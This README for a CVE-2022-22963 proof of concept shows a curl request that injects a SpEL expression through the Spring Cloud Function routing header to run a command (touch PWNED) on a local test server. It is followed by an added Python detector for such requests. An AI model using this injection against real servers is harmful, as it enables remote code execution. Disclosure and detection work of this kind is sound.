Kirill89 / CVE-2022-22963-PoC

CVE-2022-22963 RCE PoC

Minimal example to reproduce CVE-2022-22963 remote code execution in org.springframework.cloud:spring-cloud-function-core.

Exploit

Run the server

mvn spring-boot:run

Make a request

curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter

As a result of the exploit, a file named PWNED will be created next to pom.xml.
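
A defender-side check for the request shown above, added here as an example and not part of the original repository: it parses raw HTTP requests and flags any that carry the `spring.cloud.function.routing-expression` header, matching the name case-insensitively and ignoring the body. The function names, the three-level verdict, and the sample requests are assumptions constructed for illustration.

```python
import re

# Header used by the PoC request; HTTP header names are case-insensitive.
ROUTING_HEADER = "spring.cloud.function.routing-expression"
# SpEL constructs that reach classes or methods: T(Type), new X(...), .method(...)
SPEL_CODE = re.compile(r"\bT\s*\(|\bnew\s+[\w.]+\s*\(|\.\s*\w+\s*\(")


def parse_headers(raw_request):
    """Return (request_line, [(lowercased name, value), ...]) for a raw HTTP/1.1 request."""
    # Only the head (before the first blank line) is parsed; the body is ignored.
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def classify(raw_request):
    """'ok': header absent; 'suspicious': header present; 'exploit': value has SpEL code."""
    _, headers = parse_headers(raw_request)
    values = [v for n, v in headers if n == ROUTING_HEADER]
    if not values:
        return "ok"
    if any(SPEL_CODE.search(v) for v in values):
        return "exploit"
    # Assumed policy: a client-supplied routing expression is worth reviewing by itself.
    return "suspicious"


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "plain": "POST /functionRouter HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n\r\nxxx",
    "routed": "POST /functionRouter HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
              "Spring.Cloud.Function.Routing-Expression: 'uppercase'\r\n\r\nxxx",
    "poc": "POST /functionRouter HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n"
           'spring.cloud.function.routing-expression: '
           'T(java.lang.Runtime).getRuntime().exec("touch PWNED")\r\n\r\nxxx',
}

if __name__ == "__main__":
    for name, request in SAMPLES.items():
        print(f"{name}: {classify(request)}")
```
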

Additional info
